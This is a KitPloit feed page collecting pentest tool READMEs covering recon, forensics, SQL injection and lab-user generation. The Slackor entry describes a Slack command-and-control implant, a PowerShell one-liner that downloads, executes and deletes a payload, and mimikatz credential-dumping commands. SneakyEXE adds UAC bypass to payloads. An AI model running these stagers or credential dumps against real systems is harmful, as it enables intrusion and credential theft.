Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5840 articles
Browse latest View live

Sherlock - Find Usernames Across Social Networks

July 1, 2019, 3:12 pm
$
0
0

Find usernames across social networks



Installation
NOTE: Python 3.6 or higher is required.
# clone the repo
$ git clone https://github.com/sherlock-project/sherlock.git

# change the working directory to sherlock
$ cd sherlock

# install python3 and python3-pip if not exist

# install the requirements
$ pip3 install -r requirements.txt

Usage
$ python3 sherlock.py --help
usage: sherlock.py [-h] [--version] [--verbose] [--rank]
                   [--folderoutput FOLDEROUTPUT] [--output OUTPUT] [--tor]
                   [--unique-tor] [--csv] [--site SITE_NAME]
                   [--proxy PROXY_URL] [--json JSON_FILE]
                   USERNAMES [USERNAMES ...]

Sherlock: Find Usernames Across Social Networks (Version 0.6.4)

positional arguments:
  USERNAMES             One or more usernames to check with social networks.

optional arguments:
  -h, --help            show this help message and exit
  --version             Display version information and dependencies.
  --verbose, -v, -d, --debug
                        Display extra debugging information    and metrics.
  --rank, -r            Present websites ordered by their Alexa.com global
                        rank in popularity.
  --folderoutput FOLDEROUTPUT, -fo FOLDEROUTPUT
                        If using multiple usernames, the output of the results
                        will be saved at this folder.
  --output OUTPUT, -o OUTPUT
                        If using single username, the output of the result
                        will be saved at this file.
  --tor, -t             Make requests over TOR; increases runtime; requires
                        TOR to be installed and in system path.
  --unique-tor, -u      Make requests over TOR with new TOR circuit after each
                        request; increases runtime; requires TOR to be
                        installed and in system path.
  --csv                 Create Comma-Separated Values (CSV) File.
  --site SITE_NAME      Limit analysis to just the listed sites. Add multiple
                        options to specify more than one site.
  --proxy PROXY_URL, -p PROXY_URL
                        Make requests over a proxy. e.g.
                        socks5://127.0.0.1:1080
  --json JSON_FILE, -j JSON_FILE
                        Load data from a JSON file or an online, valid, JSON
                        file.
  --print-found
   Prints only found messages. Errors, and invalid
   username errors will not appear.
For example, run python3 sherlock.py user123, and all of the accounts found will be stored in a text file with the username (e.g user123.txt).

Docker Notes
If you have docker installed you can build an image and run this as a container.
docker build -t mysherlock-image .
Once the image is built sherlock can be invoked by running the following:
docker run --rm mysherlock-image user123
The optional --rm flag removes the container filesystem on completion to prevent cruft build-up. See https://docs.docker.com/engine/reference/run/#clean-up---rm
One caveat is the text file that is created will only exist in the container so you will not be able to get at that.
Or you can simply use "Docker Hub" to run sherlock:
docker run theyahya/sherlock user123

Adding New Sites
Please look at the Wiki entry on adding new sites to understand the issues.

Tests
If you are contributing to Sherlock, then Thank You!
Before creating a pull request with new development, please run the tests to ensure that all is well. It would also be a good idea to run the tests before starting development to distinguish problems between your environment and the Sherlock software.
The following is an example of the command line to run all the tests for Sherlock. This invocation hides the progress text that Sherlock normally outputs, and instead shows the verbose output of the tests.
$ python3 -m unittest tests.all --buffer --verbose
Note that we do currently have 100% test coverage. Unfortunately, some of the sites that Sherlock checks are not always reliable, so it is not uncommon to get response errors.


Search

SQLMap v1.3.7 - Automatic SQL Injection And Database Takeover Tool

July 2, 2019, 6:30 am
$
0
0

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation
You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage
To get a list of basic options and switches use:
python sqlmap.py -h
To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.

Demo

Links

Translations


Icebox - Virtual Machine Introspection, Tracing & Debugging

July 2, 2019, 2:56 pm
$
0
0

Icebox is a Virtual Machine Introspection solution that enable you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility.
Files which might be helpful:

Demo


Project Organisation

Getting Started
Some sample have been written in samples folder.
You can build them with these instructions after you installed the requirements.
If your using a Windows guest you might want to set the environement variable _NT_SYMBOL_PATH to a folder that contains your guest's pdb. Please note that icebox setup will fail if it does not find your guest's kernel's pdb.
vm_resume:
vm_resume just pause then resume your VM.
cd icebox/bin/$ARCH/
./vm_resume <vm_name>
nt_writefile:
nt_writefile breaks when a process calls ntdll!NtWriteFile, and dumps what's written in a file on your host in the current directory.
cd icebox/bin/$ARCH/
./nt_writefile <vm_name> <process_name>
heapsan:
heapsan breaks ntdll memory allocations from a process and add padding before & after every pointer. It is still incomplete and doesn't do any checks yet.
cd icebox/bin/$ARCH/
./heapsan <vm_name> <process_name>
wireshark:
wireshark breaks when ndis driver reads or sends network packets and creates a wireshark trace (.pcapng). Each packet sent is associated to a callstack from kernel land to userland if necessary.
cd icebox/bin/$ARCH/
./wireshark <name> <path_to_capture_file>


MIG - Distributed And Real Time Digital Forensics At The Speed Of The Cloud

July 3, 2019, 5:53 am
$
0
0

MIG is Mozilla's platform for investigative surgery of remote endpoints.

Quick Start w/ Docker
You can spin up a local-only MIG setup using docker. The container is not suitable for production use but lets you experiment with MIG quickly, providing a single container environment that has most of the MIG components available.
To pull from Docker Hub:
$ docker pull mozilla/mig
$ docker run -it mozilla/mig
Or, if you have the source checked out in your GOPATH you can build your own image:
$ cd $GOPATH/src/github.com/mozilla/mig
$ docker build -t mozilla/mig:latest .
$ docker run -it mozilla/mig
Once inside the container, you can use the MIG tools to query a local agent, as such:
mig@5345268590c8:~$ /go/bin/mig file -t all -path /usr/bin -sha2 5c1956eba492b2c3fffd8d3e43324b5c477c22727385be226119f7ffc24aad3f
1 agents will be targeted. ctrl+c to cancel. launching in 5 4 3 2 1 GO
Following action ID 7978299359234.
 1 / 1 [=========================================================] 100.00% 0/s4s
100.0% done in 3.029105958s
1 sent, 1 done, 1 succeeded
ed11f485244a /usr/bin/wget [lastmodified:2016-07-05 15:32:42 +0000 UTC, mode:-rwxr-xr-x, size:419080] in search 's1'
1 agent has found results
To explore the capabilities of MIG, take a look at the CheatSheet.

What is this?
MIG is composed of agents installed on all systems of an infrastructure that are be queried in real-time to investigate the file-systems, network state, memory or configuration of endpoints.
CapabilityLinuxMacOSWindows
file inspectionyesyesyes
network inspectionyesyes(partial)
memory inspectionyesyesyes
vuln managementyes(planned)(planned)
log analysis(planned)(planned)(planned)
system auditingyes(planned)(planned)
Imagine it is 7am on a saturday morning, and someone just released a critical vulnerability for your favorite PHP application. The vuln is already exploited and security groups are releasing indicators of compromise (IOCs). Your weekend isn't starting great, and the thought of manually inspecting thousands of systems isn't making it any better.
MIG can help. The signature of the vulnerable PHP app (the md5 of a file, a regex, or just a filename) can be searched for across all your systems using the file module. Similarly, IOCs such as specific log entries, backdoor files with md5 and sha1/2/3 hashes, IP addresses from botnets or byte strings in processes memories can be investigated using MIG. Suddenly, your weekend is looking a lot better. And with just a few commands, thousands of systems will be remotely investigated to verify that you're not at risk.


MIG agents are designed to be lightweight, secure, and easy to deploy so you can ask your favorite sysadmins to add it to a base deployment without fear of breaking the entire production network. All parameters are built into the agent at compile time, including the list and ACLs of authorized investigators. Security is enforced using PGP keys, and even if MIG's servers are compromised, as long as our keys are safe on your investigator's laptop, no one will break into the agents.
MIG is designed to be fast, and asynchronous. It uses AMQP to distribute actions to endpoints, and relies on Go channels to prevent components from blocking. Running actions and commands are stored in a Postgresql database and on disk cache, such that the reliability of the platform doesn't depend on long-running processes.
Speed is a strong requirement. Most actions will only take a few hundreds milliseconds to run on agents. Larger ones, for example when looking for a hash in a big directory, should run in less than a minute or two. All in all, an investigation usually completes in between 10 and 300 seconds.
Privacy and security are paramount. Agents never send raw data back to the platform, but only reply to questions instead. All actions are signed by GPG keys that are not stored in the platform, thus preventing a compromise from taking over the entire infrastructure.

Technology
MIG is built in Go and uses a REST API that receives signed JSON messages distributed to agents via RabbitMQ and stored in a Postgres database.
It is:
  • Massively Distributed means Fast.
  • Simple to deploy and Cross-Platform.
  • Secured using OpenPGP.
  • Respectful of privacy by never retrieving raw data from endpoints.
Check out this 10 minutes video for a more general presentation and a demo of the console interface.


MIG was recently presented at the SANS DFIR Summit in Austin, Tx. You can watch the recording below:


Discussion
Join #mig on irc.mozilla.org (use a web client such as mibbit).

Documentation
All documentation is available in the 'doc' directory and on http://mig.mozilla.org .


Hash-Identifier - Software To Identify The Different Types Of Hashes Used To Encrypt Data And Especially Passwords

July 3, 2019, 3:22 pm
$
0
0

Software to identify the different types of hashes used to encrypt data and especially passwords.
Encryption formats supported:
  • ADLER-32
  • CRC-32
  • CRC-32B
  • CRC-16
  • CRC-16-CCITT
  • DES(Unix)
  • FCS-16
  • GHash-32-3
  • GHash-32-5
  • GOST R 34.11-94
  • Haval-160
  • Haval-192 110080 ,Haval-224 114080 ,Haval-256
  • Lineage II C4
  • Domain Cached Credentials
  • XOR-32
  • MD5(Half)
  • MD5(Middle)
  • MySQL
  • MD5(phpBB3)
  • MD5(Unix)
  • MD5(Wordpress)
  • MD5(APR)
  • Haval-128
  • MD2
  • MD4
  • MD5
  • MD5(HMAC(Wordpress))
  • NTLM
  • RAdmin v2.x
  • RipeMD-128
  • SNEFRU-128
  • Tiger-128
  • MySQL5 - SHA-1(SHA-1($pass))
  • MySQL 160bit - SHA-1(SHA-1($pass))
  • RipeMD-160
  • SHA-1
  • SHA-1(MaNGOS)
  • Tiger-160
  • Tiger-192
  • md5($pass.$salt) - Joomla
  • SHA-1(Django)
  • SHA-224
  • RipeMD-256
  • SNEFRU-256
  • md5($pass.$salt) - Joomla
  • SAM - (LM_hash:NT_hash)
  • SHA-256(Django)
  • RipeMD-320
  • SHA-384
  • SHA-256
  • SHA-384(Django)
  • SHA-512
  • Whirlpool
  • And more...

Encryption algorithms that can not be differentiated unless they have been decrypted, so the efficiency of the software also depends on the user's criteria.


Slackor - A Golang Implant That Uses Slack As A Command And Control Server

July 4, 2019, 6:30 am
$
0
0
A Golang implant that uses Slack as a command and control channel.
This project was inspired by Gcat and Twittor.






This tool is released as a proof of concept. Be sure to read and understand the Slack App Developer Policy before creating any Slack apps.

Setup
Note: The server is written in Python 3
For this to work you need:
  • A Slack Workspace
  • Register an app with the following permissions:
    • channels:read
    • channels:history
    • channels:write
    • files:write:user
    • files:read
  • Create a bot
This repo contains five files:
  • install.sh Installs dependancies
  • setup.py The script to create the slack channels, database, and implant
  • server.py The Slackor server, designed to be ran on Linux
  • template.go Template for the generated implant
  • requirements.txt Python dependencies (installed automatically)
To get started:
  • Run install.sh
  • Run setup.py
    • Supply the OAuth Access Token and Bot User OAuth Access Token from your app
After running the script successfully, a file agent.exe will be created. It will be a 64bit Go binary packed with UPX.
After starting server.py on a Linux host, execute agent.exe on your target Windows host.
Run the "stager" module to generate a one-liner and other droppers.
powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe
This will execute InvokeWebRequest(PS v.3+) to download the payload, execute it using a LOLBin, and then delete itself once killed. This is a working example but the command can tweaked to use another download method or execution method.

Usage
Type "help" or press [TAB] to see a list of available commands. type "help [COMMAND]" to see a description of that command.
(Slackor)
  • Help - Displays help menu
  • interact - Interact with an agent
  • list - List all registered agents
  • remove - kill and remove an agent
  • revive - Sends a signal to all agents to re-register with the server
  • stager - Generates a one-liner to download an execute the implant
  • quit - Quit the program
  • wipefiles - Deletes all uploaded files out of Slack
Once an agent checks in, you can interact with it. Use "interact [AGENT] to enter into an agent prompt. Type "help" or press [TAB] to see a list of available commands.
(Slackor:AGENT)
  • back - Return to the main menu
  • beacon - change the amount of time between each check-in by an agent (default is 5 seconds)
  • bypassuac - Attempts to spawn a high integrity agent
  • cleanup - Removes persistence artifacts
  • clipboard - Retreives the contents of the clipboard
  • defanger - Attempts to de-fang Windows Defender
  • download - Download a file from the agent to the Slackor server
  • duplicate - Causes the agent to spawn another invocation of itself
  • getsystem - Spawns an agent as NTAUTHORITY/SYSTEM
  • help - Displays help menu
  • keyscan - Starts a keylogger on the agent
  • kill - Kill the agent
  • minidump - Dumps memory from lsass.exe and downloads it
  • persist - Creates persistence by implanting a binary in an ADS
  • samdump - Attempts to dump the SAM file for offline hash extraction
  • screenshot - Takes a screenshot of the desktop and retrieves it
  • shellcode - Executes x64 raw shellcode
  • sleep - Cause the agent to sleep once (enter time in seconds)
  • sysinfo - Displays the current user, OS version, system architecture, and number of CPU cores
  • upload - Upload a file to the agent from the Slackor server
  • wget - Pull down arbitrary files over HTTP/HTTPS

OPSEC Considerations
Command output and downloaded files are AES encrypted in addition to TLS transport encryption.
Modules will warn you before performing tasks that write to disk.
When executing shell commands, take note that cmd.exe will be executed. This may be monitored on the host. Here are several OPSEC safe commands that will NOT execute cmd.exe:
  • cat - prints file content
  • cd - change directory
  • hostname - Displays the name of the host
  • ifconfig - Displays interface information
  • ls - list directory contents
  • mkdir - Creates a directory
  • pwd - prints the current working directory
  • rm - removes a file
  • rmdir - removes a directory
  • whoami / getuid - prints the current user

Credits

Future goals

FAQ:
Is this safe to use for red teams/pentesting?
Yes, given some conditions. While the data is encrypted in transit, the agent contains the key for decryption. Anyone who acquires a copy of the agent could reverse engineer it and extract the API keys and the AES secret key. Anyone who compromises or otherwise gains access to the workspace would be able to retrieve all data within it. For this reason, it is not recommended to re-use infrastructure against multiple organizations.
What about Mimikatz?
The implant does not have in-memory password dumping functionality. If you need logonPasswords, you can try the following:
(Slackor: AGENT)minidump
THis will automically extract passwords with Pypykatz. Alternatively, you can use Mimikatz on Windows.
>mimikatz.exe
mimikatz # sekurlsa::Minidump lsassdump.dmp
mimikatz # sekurlsa::logonPasswords
Is it cross-platform?
Not yet. It has not been fully tested on a variety of systems. The server was designed to run on Kali Linux and the agent on Windows 10.
How well does it scale?
Scalability is limited by the Slack API. If you have multiple agents, consider increasing the beacon interval of beacons not in use.
Is it vulnerable to standard beacon analysis?
Currently each beacon has 20% jitter built in, and beacon times can be customized. Agent check-in request and response packets will be about the same size each time as long as no new commands are recieved.
Why did you do [x] when a better way to do it is [y]?
I tried my best. PRs are encouraged :)
It gets caught by AV!
The built-in HTA stager is created by SpookFlare which is based on Demiguise. If you want your droppers to not get snagged you probably want to go custom. The built in droppers are just there to get you started.


Fbchecker - Facebook Mass Account Checker

July 4, 2019, 3:39 pm
$
0
0

Facebook Mass Account Checker

Simple Installation :
apt install git
apt install php
git clone https://github.com/fdciabdul/fbchecker
cd fbchecker
php fbcheck.php
Usage
 php fbcheck.php target.txt


Wesng - Windows Exploit Suggester

July 5, 2019, 6:12 am
$
0
0

WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.

Usage
  1. Obtain the latest database of vulnerabilities by executing the command wes.py --update.
  2. Use Windows' built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txt
  3. Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities are currently exposed, including exploits if available.
  4. As the data provided by Microsoft is frequently incomplete and false positives are reported by wes.py, make sure to check the Eliminating false positives page at the Wiki on how to deal with this. For an overview of all available parameters, check CMDLINE.md.

Collector
This GitHub repository regularly updates the database of vulnerabilities, so running wes.py with the --update parameter gets the latest version. If manual generation of the .csv file with hotfix information is required, use the scripts from the /collector folder to compile the database. Read the comments at the top of each script and execute them in the order as they are listed below. Executing these scripts will produce CVEs.csv. The WES-NG collector pulls information from various sources:
  • Microsoft Security Bulletin Data: KBs for older systems [1]
  • MSRC: The Microsoft Security Update API of the Microsoft Security Response Center (MSRC): Standard source of information for modern Microsoft Updates [2]
  • NIST National Vulnerability Database (NVD): Complement vulnerabilities with Exploit-DB links [3] These are combined into a single .csv file which is compressed and hosted in this GitHub repository.

Rationale
I developed WES-NG because while GDSSecurity's Windows-Exploit-Suggester worked excellently for operating systems in the Windows XP and Windows Vista era, GDSSecurity's Windows-Exploit-Suggester does not work for operating systems like Windows 10 and vulnerabilities published in recent years. This is because Microsoft replaced the Microsoft Security Bulletin Data Excel file [1] on which GDSSecurity's Windows-Exploit-Suggester is fully dependent, by the MSRC API [2]. The Microsoft Security Bulletin Data Excel file has not been updated since Q1 2017, so later operating systems and vulnerabilities cannot be detected. Thanks @gdssecurity, for this great tool which has served many of us for so many years!

Bugs

Changelog

Improvements
  • Add support for NoPowerShell's Get-SystemInfo cmdlet output
  • Add support for wmic qfe output together with support for parameters to manually specify the operating system
  • Add support for alternative output formats of systeminfo (csv, table)
  • More testing on the returned false positive vulnerabilities - see also the wiki
  • Add support for Itanium architecuture

References


Authored by Arris Huijgen (@bitsadmin - https://github.com/bitsadmin/)


Search

Rock-ON - An All In One Recon Tool That Will Just Get A Single Entry Of The Domain Name And Do All Of The Work Alone

July 5, 2019, 2:56 pm
$
0
0

Rock-On is a all in one recon tool that will help your Recon process give a boost. It is mainley aimed to automate the whole process of recon and save the time that is being wasted in doing all this stuffs manually. A thorough blog will be up in sometime. Stay tuned for the Stable version with a UI.

Features
  1. Sub Domain Scraping
  2. Finding A.S.N -> Netblocks -> IP's
  3. Resolving
  4. Finding Ports
  5. Finding VHost
  6. Finding Directories
  7. Finding Sub Takeovers
  8. Asset tracker with live monitoring
  9. Push Notifications to Slack
  10. Finding JS link then relative links in them and some sensitive files
  11. Active and passive crawling

Recommendation
Machine Configuration - Debian- 9.4, 4 GB RAM on DigitalOcean and its will be good to run this tool on a new and fresh VPS.

For Censys:
Set the API and SECRET KEY in the sub.sh unless you want to set it again and again.
For removing:
1. Delete the lines 13-18
2. Then set you API and SECRET KEY on line 47 & 48 like this: export CENSYS_API_ID=your_key_here

For getting notification on Slack:
Change the webhook address to your one in sub.sh, ASN.sh and Sublert.py-> config.py to get notification while you do your other works.
For changing:
1. Replace the Webhook address at line 113 in sub.sh and 15 in ASN.sh
2. Replace the Webhook address in Tools/sublert/config.py

AND
Follow @yassineaboukir guide to configure the slack for sublert and also for creating a webhook address for sub.sh and ASN.sh here: https://medium.com/@yassineaboukir/automated-monitoring-of-subdomains-for-fun-and-profit-release-of-sublert-634cfc5d7708

Tools Added
Thanks to all the aurthors who have written these scripts and making a huge contribution to the great community. A big shout-out for @ehsahil for his blog on recon that helped me a lot while making this tool and taking examples for the repository.
  1. Sublist3r
  2. Knock
  3. Subfinder
  4. Censys
  5. Amass
  6. CT Logs
  7. CTFR
  8. Wayback
  9. San Domains
  10. AltDns
  11. NMAP
  12. Masscan
  13. MassDNS
  14. Sublert
  15. Aquatone
  16. Vhost
  17. Rapid7 FDNS DB
  18. AWS-CLI
  19. Dirsearch
  20. More to be added...

Requirements

Go-Languange
Install by Following methods:
wget https://dl.google.com/go/go1.12.5.linux-amd64.tar.gz
tar -C /usr/local -xzf go1.12.5.linux-amd64.tar.gz
rm -f go1.12.5.linux-amd64.tar.gz
nano ~/.profile
Add this lines
export PATH=$PATH:/usr/local/go/bin
export GOROOT=/usr/local/go

Installation

Note: For a new Fresh VPS run this commands first:
sudo apt-get upgrade && sudo apt-get update && sudo apt-get install git
git clone https://github.com/SilverPoision/Rock-ON.git
cd Rock-ON
chmod +x rockon.sh
./rockon.sh
1
Also don't forget to configure your AWS credentials by running
aws configure

Usage
./rockon.sh
Enter your choice and then the required Information.

Screenshot



Note: Run the below command while running the 4th option for the first time.
gem install colorize

Give Rock-On some Love
If this tool was useful to you during your recon stages - I would love to know. Any suggestions or ideas for this tool are appreciated - Just DM me on Facebook or Twitter


Youzer - Fake User Generator For Active Directory Environments

July 6, 2019, 6:00 am
$
0
0

Fake User Generator for Active Directory Environments

Introduction
The goal of Youzer is to create information rich Active Directory environments. This uses the python3 library 'faker' to generate random accounts.
pip3 install faker
You can either supply a wordlist or have the passwords generated. The generated option is great for testing things like hashcat rule masks. Wordlist option is useful when wanting to supply a specific password list seeded into an environment, or to practice dictionary attacks.
The output is a CSV and a PowerShell script where both can be copied to the target. When executed, the PowerShell script binds over LDAP so doesn't rely on the newer Active Directory modules and creates each user object. Currently the OU's need to exist, but this tool is a sub-project of 'Labseed' where the Active Directory structure will be created.

RoadMap
  • Generate multiple departments (OU's)
  • Generate grouping structure and randomly assign
  • Implement additional Faker object options to populate other LDAP fields such as Address, Region
  • Create an organisational chart of the nested grouping structure

Examples
Youzer can create 100,000 users in under 30 seconds and 1,000,000 users in around 3 minutes.
[-] Domain Name set to : example
[*] Writing to output file : sales_example.csv
[!] Generating 100000 users in password generate mode
[!] Creating Powershell script for import : sales_example.ps1
python3 youzer.py --generate --generate_length 20 --ou  --domain example      20.35s user 0.11s system 95% cpu 21.354 total

YouTube Video


Creating 1000 user accounts with a randomly generated alphanumeric password choice of 20 characters
python3 youzer.py --generate --generate_length 20 --ou "ou=sales,dc=example,dc=domain" --domain example --users 1000 --output sales_example.csv



?88   d8P  d8888b ?88   d8Pd88888P  d8888b  88bd88b
d88   88  d8P' ?88d88   88    d8P' d8b_,dP  88P'  `
?8(  d88  88b  d88?8(  d88  d8P'   88b     d88
`?88P'?8b `?8888P'`?88P'?8bd88888P'`?888P'd88'
       )88
      ,d8P                            version : 0.1
   `?888P'

author  : @lorentzenman
team    : SpiderLabs


[-] Domain Name set to : example
[*] Writing to output file : sales_example.csv
[!] Generating 1000 users in password generate mode
[!] Creating Powershell script for import : sales_example.ps1
Sample output from CSV file created from generate option
Name,GivenName,sn,ou,password,address,description
Dennis Shaw,Dennis,Shaw,"ou=sales,dc=example,dc=domain",VwVeloi09FaECRdNbbXD,
Sam Francis,Sam,Francis,"ou=sales,dc=example,dc=domain",qhitxgjDW4gZFuraLJbB,
Ellie Freeman,Ellie,Freeman,"ou=sales,dc=example,dc=domain",7qbLcknqlPtpkOzdLyw3,
Terence Arnold,Terence,Arnold,"ou=sales,dc=example,dc=domain",lumPMbDk1YomypRj26by,
Anne Murphy,Anne,Murphy,"ou=sales,dc=example,dc=domain",6r42EGGoEJYe9PydHRTV,
Wendy Smith,Wendy,Smith,"ou=sales,dc=example,dc=domain",tKI2zFUOU8XdK4ZTUJas,
Jay Lyons,Jay,Lyons,"ou=sales,dc=example,dc=domain",wxEIbw18tW9uFYXtMI9H,
Jonathan White,Jonathan,White,"ou=sales,dc=example,dc=domain",caoHcm2Y90lIH7zskJYr,
Adam Roberts,Adam,Roberts,"ou=sales,dc=example,dc=domain",Qu0y7mlb2haQQddxYrcN,
Georgina Jones,Georgina,Jones,"ou=sales,dc=example,dc=domain",rYBjxs4tpj9Qza7HcKYI,
Lee Newton,Lee,Newton,"ou=sales,dc=example,dc=domain",6CVlBvEutc3Ahco2UI5q,
Aaron Smith,A   aron,Smith,"ou=sales,dc=example,dc=domain",hmSSoKILfvrHuHbPTDIQ,
Max Hall,Max,Hall,"ou=sales,dc=example,dc=domain",11Ys9Zdk2M8J1JAScBkP,
Kimberley Douglas,Kimberley,Douglas,"ou=sales,dc=example,dc=domain",WQ9285gSHv2MXkwoLYlg,
Denise Fisher,Denise,Fisher,"ou=sales,dc=example,dc=domain",CT1pbfAnCoezuyrJbQX9,

Creating 1000 user accounts from a source word list
python3 youzer.py --wordlist ~/tools/pw/Probable-Wordlists/Real-Passwords/Top12Thousand-probable-v2.txt --ou "ou=IT,dc=example,dc=domain" --domain example --users 1000 --output IT_example.csv



?88   d8P  d8888b ?88   d8Pd88888P  d8888b  88bd88b
d88   88  d8P' ?88d88   88    d8P' d8b_,dP  88P'  `
?8(  d88  88b  d88?8(  d88  d8P'   88b     d88
`?88P'?8b `?8888P'`?88P'?8bd88888P'`?888P'd88'
       )88
      ,d8P                            version : 0.1
   `?888P'

author  : @lorentzenman
team    : SpiderLabs


[-] Domain Name set to : example
[*] Writing to output file : IT_example.csv
[!] Generating 1000 users in wordlist mode
[!] Creating Powershell script for import : IT_example.ps1
Sample output of CSV file from above wordlist option
Name,GivenName,sn,ou,password,address,description
Rhys Parker,Rhys,Parker,"ou=IT,dc=example,dc=domain",houston,
Geoffrey Harris,Geoffrey,Harris,"ou=IT,dc=example,dc=domain",clothing,
Georgia Davis,Georgia,Davis,"ou=IT,dc=example,dc=domain",spotty,
Gemma Norris,Gemma,Norris,"ou=IT,dc=example,dc=domain",brendan1,
Daniel Marsh,Daniel,Marsh,"ou=IT,dc=example,dc=domain",pauline,
Dominic Harvey,Dominic,Harvey,"ou=IT,dc=example,dc=domain",devin,
Teresa Stokes,Teresa,Stokes,"ou=IT,dc=example,dc=domain",snapple,
Joanna Morgan,Joanna,Morgan,"ou=IT,dc=example,dc=domain",volcom,
Oliver Middleton,Oliver,Middleton,"ou=IT,dc=example,dc=domain",master,


DarkScrape - OSINT Tool For Scraping Dark Websites

July 6, 2019, 3:12 pm
$
0
0

OSINT Tool to find Media Links in Tor Sites.

Tested On
  • Kali Linux 2019.2
  • Ubuntu 18.04
  • Nethunter
  • Arc Linux

Installation
git clone https://github.com/itsmehacker/DarkScrape.git
pip3 install -r requirements.txt

Features
  • Download Media
  • Scrape From Single Url
  • Scraping From Files
    • Txt
    • Csv
    • Excel

Inspired By:
Jake Creps @jakecreps


NetSet - Operational Security Utility And Automator

July 7, 2019, 6:26 am
$
0
0

Operational Security utility and automator.
NetSet is designed to automate a number of operations that will help the user with securing their network traffic. It also provides an easy way to gather proxies and run utilities through Tor.
All the utilities installed and used by NetSet will be automatically configured as well. Of course the tool itself isn't the be all of Operational Security. Rather it is a convenient way of getting yourself set up with the basics.
NetSet facilitates, among other things;
A terminal multiplexer on demand, that has it's sessions routed through Tor. Secured DNS traffic through automatic installation and configuration of DNSCrypt-proxy. Tor Wall functionality that forces all traffic through the Tor Network. Easy access to online OPSEC resources, the web resources in question can be opened in-script
And more.

Usage
After cloning the repo navigate to the NetSet directory and run the following:
chmod +x *.sh
 ./netset-main.sh --install

#sudo ./netset-main.sh --install
This will install and configure everything you'll need for NetSet to function properly.

Update
Using sudo to start the script will execute every operation within the script as root, this means you won't be prompted for your sudo password when an operation requires elevated privileges. However all items written by NetSet will consequently be owned by root as well, including backup directories. Last but not least; when considering security implications, it is not recommended to run everything with super user privileges.
Starting the main script with sudo will be optional from now on to reflect the above considerations.

Options
Please see an option overview below.
CLI Arguments                            
    '-t' or '--terminal' Starts         
    terminal multiplexer with all       
    connections routed through Tor        

    '-s' or '--status' prints a status   
    overview of NetSet related network   
    utilities and their current state.

    '-i' or '--install' runs a script
    designed to install all of NetSet's
    dependencies and configures them

Menu Options

 'Usage'          - Print options overview
 'Status'         - Print Status overview
 'Spoof MAC'      - Spoof MAC Address
 'Random Proxies' - Scrape random proxies
 'GeoSort Proxies'- Scrape GeoSorted proxies
 'ProtonVPN'      - Start ProtonVPN
 'Tor Terminal'   - Start terminal multi-
                    plexer, with all sessions
                    routed through Tor   
 'Tor Wall'       - Configures iptables to
                    force all connections
                    through Tor.
 'OPSEC Resources'- Display NetSet's included
                    list of web resources.
        Select an entry to open
                    it in your default browser

Note
Tested on Ubuntu 19.04
I plan on expanding this tool in the future with even more OPSEC related resources and/or operations.
Should you happen to come across a bug or have any questions regarding this tool. Please feel free to Open a Ticket


SneakyEXE - Embedding "UAC-Bypassing" Function Into Your Custom Payload

July 7, 2019, 3:23 pm
$
0
0

A tool which helps you embedding UAC-Bypassing function into your custom Win32 payloads ( x86_64 architecture specifically )
  • Tested on Windows 7,8,10 ( 64bit)
  • Free and Open-sourced with full source codes published

Tutorial


Requirements:
LinuxWindows
ArchitectureOptionalx86_64
Python 3.x >YESNO
ModuletermcolorNO
DistrosAnyWindows
VersionAnyWindows 7,8,10

Usage:
[ Linux ]:
This tool does require a python module called termcolor. When you run the script it will automatically install it if you haven't, but if you want the tool to function faster, i would suggest you doing it manually before proceeding
$ pip3 install termcolor #installing termcolor
$ #Temporary usage only, installation below
$ git clone https://github.com/Zenix-Blurryface/SneakyEXE.git
$ cd SneakyEXE/Linux
$ chmod +x sneakyexe.py
$ ./sneakyexe <option>=<path to payload/code> out=<where you wanna save>
[ Windows ]:
  • visit https://github.com/Zenix-Blurryface/SneakyEXE
  • Download the repository, "clone or download" -> "Download ZIP"
  • Unzip it into your optional directory
  • Change dir to \SneakyEXE\Win32\
  • Execute sneakyexe.exe ( or sys\sneakyexe.exe for an improved startup speed )
  • ( Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one )
